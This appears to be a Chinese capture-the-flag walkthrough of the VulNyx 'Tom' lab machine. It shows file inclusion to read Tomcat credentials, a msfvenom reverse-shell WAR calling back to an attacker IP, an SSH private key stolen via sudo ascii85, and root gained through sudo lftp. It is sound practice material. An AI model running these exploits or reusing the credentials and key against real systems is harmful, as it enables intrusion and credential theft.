首页 靶场练习 VulNyx Medium

# 靶场搭建

下载:Tom

Nat,IP: 192.168.1.168

# 渗透过程

# 信息初收集

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
|   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
|_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
8080/tcp open  http    Apache Tomcat 9.0.54
|_http-title: Apache Tomcat/9.0.54
|_http-favicon: Apache Tomcat

枚举 80 口的目录,得到 tomcat.php 页面,再枚举一下参数得到 filez ,文件包含 tomcat 的系统服务文件 /etc/systemd/system/tomcat.service

找到 CATALINA_HOME, 然后去包含配置文件 tomcat-users.xml

http://192.168.1.168/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml

需要 F12 查看的

得到账号密码: tomcat/t0mL1k3$c4t$!!!

传 war 包拿 shell

┌──(root㉿kali)-[~/Tom]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.129 LPORT=4444 -f war -o gddfeng.war
Payload size: 1092 bytes
Final size of war file: 1092 bytes
Saved as: gddfeng.war
                                                                                                                                                                                                                   
┌──(root㉿kali)-[~/Tom]
└─# curl --upload-file gddfeng.war -u 'tomcat:t0mL1k3$c4t$!!!' "http://192.168.1.168:8080/manager/text/deploy?path=/gddfeng"
OK - Desplegada aplicación en trayectoria de contexto [/gddfeng]
┌──(root㉿kali)-[~/Tom]
└─# curl http://192.168.1.168:8080/gddfeng/
拿到反弹 shell
# 提权
tomcat@tom:~$ sudo -l
Matching Defaults entries for tomcat on tom:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tomcat may run the following commands on tom:
    (nathan) NOPASSWD: /usr/bin/ascii85
tomcat@tom:~$ LFILE=/home/nathan/.ssh/id_rsa
tomcat@tom:~$ sudo -u nathan ascii85 "$LFILE" | ascii85 --decode
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxwsy7rdaOaFyP/BIhYzaFwqVekjOrjRO5OONkLT0EUo5eUG0
udkGBFoUZuVcZKiV3KLFFw84wJ7W3FhQViOyyi5LeG53xeGrK0IA6jWXKA0rC4z8
XWZg6JzN+/Q4Sz2vvJ14VLbElYxpl4KdkvS/WrJAZ8iZ4GDVqbSseZSXhiFQqJen
NCOTpxJIPIEkwRg6PptNag1vcWcbKIZ7GzB2ny2BHAPOJ47/IKMfCtRmpNzMyPVs
VtGhzczGFvFadm52xLcbiWUb4FqaNyfVnU+RY8Ph6rXoVLLncbaIU1hhyjyG/N/Z
U2dRHydd3S5RuvOAvfoWFRiUGps7ximt/Rmv7QIDAQABAoIBAAY5GmmOP/rnSkwn
dgz+316zDQNavWOC7SiI2Mc6cRsNSAi7fiwFVgPS0Sp6Z04aWz0ftavH5Q1Yqf0P
octfqFpb4i4svf/o01Ix6Rdpf4VYDA17ZfSBm+wJ4wLKmuv3TMRH5Bg58qF+V1rO
UaDjmAv84Lid8/mo7WU16eKPO8GMwPqbWbTtzmY9cm6LIdZP74XUKhDbPK6WizTl
4J8dba3vSBjMtkJOqeSVLyDIYXAwZpCzj6B9Yt9JhfOD4c5DCcPXDv/hJsvRrGYZ
UAoStJHOFIXMhi8i3fTKfpg+xnHMp83pzWL4ExDq09mKvJ6NoAzUb8g4WLs+lq+2
5RZBf50CgYEA6Nfio2RxqtvrimSEjISi+Zuafk89yFdi0mzTpLIxaBdYcFgpEXcf
F8M3NNB0dLU7f46cKojVfwff6ZR/3TvCYgSDlUQl2wRe0QlRY0SxRyHpvHOVhEWX
M5quiV0Zhgon7Zop7cGRHBfPOPgIENmjurO7mQ0+iaQFvVx5Cq1CpUMCgYEA2tbJ
tzBVadmJ2/SG+sHr1xe8Owynut0kq0E/dDWD5IF3G3/pWPxI5dW6aauBhqrPD17Q
qF+JhYQIcW6ZTfv46kloBNdoJiBEOScghKn8SfGPZFMjZDn0tcG8PBbu76s0AiNq
a2ksiR0Y1ENns4my5lelPJrjitOfn1vfw8b1aw8CgYAI6DFARNhgS9dfzOaRJYXC
fKRVTpyzbDxYhlc2RqbDL5lver/fbiofU5VqDMtXp5MmFwN8UQ2xtVBodAjMIrwV
2cxaymeUUD98SZn2bStG6FIzpkxC6hKVo8YndQtD6GGMokgWU0BEzdhceoh8dIbh
3nw/p5UL2N1rV/09XlFdVwKBgQCr36XtynhK+h/cMOEScNvZwzqC5h2WFbmHB2fe
zWkZPtVdM8kBqqNWX9ZYx+qi6eRWHhGjK+XGhzxaWpLtPMjyuVSI+OVDjHQIr0JK
73bGXIJSOTnCrgIT/mTojNp8QepHA6nBUok35zJpA8eeqrdnUc7lGoE7t5nWf0Hv
cYOu4QKBgA0YSqgmr4QZHyPGUjWo8MdsHgjAZuncsv2wiYKa/HwYqxwCQCRYnAnT
G7iUoWXqS1vgg8uSk9jX+XAxFyTgLaNFJR7K4F4eBeitTL/L/VRBmRai8aZYxlX3
s9wWdeSGfM9P5JN4JePzZXdjBT+KxbEEA29kVtipG1yByXKxpWtx
-----END RSA PRIVATE KEY-----
SSH 连上去
┌──(root㉿kali)-[~/Tom]
└─# ssh -i id_rsa [email protected]           
The authenticity of host '192.168.1.168 (192.168.1.168)' can't be established.
ED25519 key fingerprint is SHA256:W4aCT/yYEsAYSFhsgZMp4TqApHolrSjUUwc93DqYd+c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.168' (ED25519) to the list of known hosts.
Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
nathan@tom:~$ sudo -l
Matching Defaults entries for nathan on tom:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nathan may run the following commands on tom:
    (root) NOPASSWD: /usr/bin/lftp
nathan@tom:~$ sudo lftp -c '!/bin/bash'
root@tom:/home/nathan# cat /root/root.txt 
a2780681529284ec485c2d0e0a7f6831